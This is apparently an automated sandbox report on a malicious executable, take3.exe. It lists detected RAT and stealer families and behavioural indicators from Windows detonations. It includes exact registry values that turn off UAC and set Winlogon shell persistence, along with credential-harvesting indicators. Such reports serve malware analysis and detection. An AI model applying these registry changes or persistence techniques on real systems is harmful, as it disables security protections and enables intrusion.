Analysis Overview
SHA256
9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53
Threat Level: Known bad
The file take3.exe was found to be: Known bad.
Malicious Activity Summary
AmmyyAdmin payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Njrat family
Ammyy Admin
Quasar payload
Modifies WinLogon for persistence
Lokibot family
FlawedAmmyy RAT
Ammyyadmin family
Lokibot
Flawedammyy family
Modifies firewall policy service
UAC bypass
Quasar family
njRAT/Bladabindi
Quasar RAT
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Sets file to hidden
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Uses browser remote debugging
Modifies Windows Firewall
Executes dropped EXE
Checks BIOS information in registry
Identifies Wine through registry keys
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Drops startup file
Reads data files stored by FTP clients
Unsecured Credentials: Credentials In Files
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Accesses Microsoft Outlook profiles
Checks installed software on the system
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
UPX packed file
Drops file in Program Files directory
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
Program crash
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Access Token Manipulation: Create Process with Token
Browser Information Discovery
System Location Discovery: System Language Discovery
Detects Pyinstaller
NSIS installer
Views/modifies file attributes
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
outlook_win_path
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies data under HKEY_USERS
System policy modification
Runs ping.exe
Delays execution with timeout.exe
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Suspicious use of WriteProcessMemory
Gathers network information
Opens file in notepad (likely ransom note)
Suspicious use of SetWindowsHookEx
Analysis: static1
Detonation Overview
Reported
2024-11-28 01:53
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-28 01:53
Reported
2024-11-28 01:56
Platform
win7-20241023-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2908 wrote to memory of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
| PID 2908 wrote to memory of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
| PID 2908 wrote to memory of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI29082\python311.dll
| Hash | Value |
|---|---|
| MD5 | 9a24c8c35e4ac4b1597124c1dcbebe0f |
| SHA1 | f59782a4923a30118b97e01a7f8db69b92d8382a |
| SHA256 | a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7 |
| SHA512 | 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-28 01:53
Reported
2024-11-28 01:56
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Ammyy Admin
AmmyyAdmin payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Ammyyadmin family
FlawedAmmyy RAT
Flawedammyy family
Lokibot
Lokibot family
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Music\\Windows Security Health Host.exe," | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files (x86)\seetrol\client\SeetrolClient.exe = "C:\\Program Files (x86)\\seetrol\\client\\SeetrolClient.exe:*:Enabled:SeetrolClient" | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 4312 created 3488 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
njRAT/Bladabindi
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\file.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs | C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Downloads\UrlHausFiles\client.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1864 set thread context of 3808 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe |
| PID 1864 set thread context of 3976 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe |
| PID 1864 set thread context of 3140 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe |
| PID 4312 set thread context of 4272 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe |
| PID 4272 set thread context of 6976 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\STClientChat.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\dtph.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\Uninstall.cmd | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\068\dfmirage.dll | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\x64\dfmirage.dll | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\068\dfmirage.sys | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\dfmirage.inf | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\sas.dll | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\SeetrolMyService.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\SeetrolClient.cfg | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\MirrInst64.exe | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\068\dfmirage.cat | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\068\dfmirage.inf | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\x86\dfmirage.sys | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\sthooks.dll | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\STUpdate.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\x64\dfmirage.sys | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\mdph.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\MirrInst32.exe | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\Install.cmd | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\dfmirage.cat | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\x86\dfmirage.dll | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Music\Windows Security Health Host.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\file.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\ew.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\client.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
